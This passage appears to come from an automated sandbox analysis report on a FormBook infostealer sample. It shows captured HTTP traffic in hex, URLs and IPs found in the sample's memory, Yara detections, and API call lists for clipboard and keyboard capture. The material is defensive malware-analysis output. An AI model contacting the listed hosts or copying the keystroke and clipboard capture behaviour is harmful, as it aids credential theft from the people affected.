30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4d 4e 4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Fri, 10 Jan 2025 18:54:56 GMTtransfer-encoding: chunkedconnection: closeData Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 0d 0a 32 43 34 32 0d 0a 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Fri, 10 Jan 2025 18:54:58 GMTtransfer-encoding: chunkedconnection: closeData Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 0d 0a 32 43 34 32 0d 0a 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 6
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/8#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rO#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/wlyolqts
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/y#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2312003459.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000053EA000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4760274457.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4ND
                Source: CkszoACLEZHP.exe, 00000006.00000002.4762982458.0000000006367000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tals.xyz
                Source: CkszoACLEZHP.exe, 00000006.00000002.4762982458.0000000006367000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tals.xyz/h8xm/
                Source: choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.earbudsstore.shop/
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.000000000557C000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006C3C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://djwe.bekru.wgljk.cn/123.html
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?1da591af2ff1138fe9a515dc33eb5bf7
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hosting.xyz/wiki/hosting/errors/site-not-served/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004A7E000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.000000000613E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: choice.exe, 00000007.00000003.2863254118.0000000007FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpg
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/DYMAR
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/favicon.png
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/account
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/login
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/newsletter
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/order
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/register
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/return/add
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/voucher
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/wishlist
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=affiliate/login
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/currency/currency
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/language/language
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=error/not_found&amp;bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/contact
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/sitemap
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/compare
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/manufacturer
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/special
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/informaciya-o-dostavke
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/o-nas
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/politika-bezopasnosti
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/usloviya-soglasheniya
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-0V86MNJQXC
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/$
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: OVZizpEU7Q.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: OVZizpEU7Q.exe, 00000000.00000000.2283868731.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1ef33abd-c
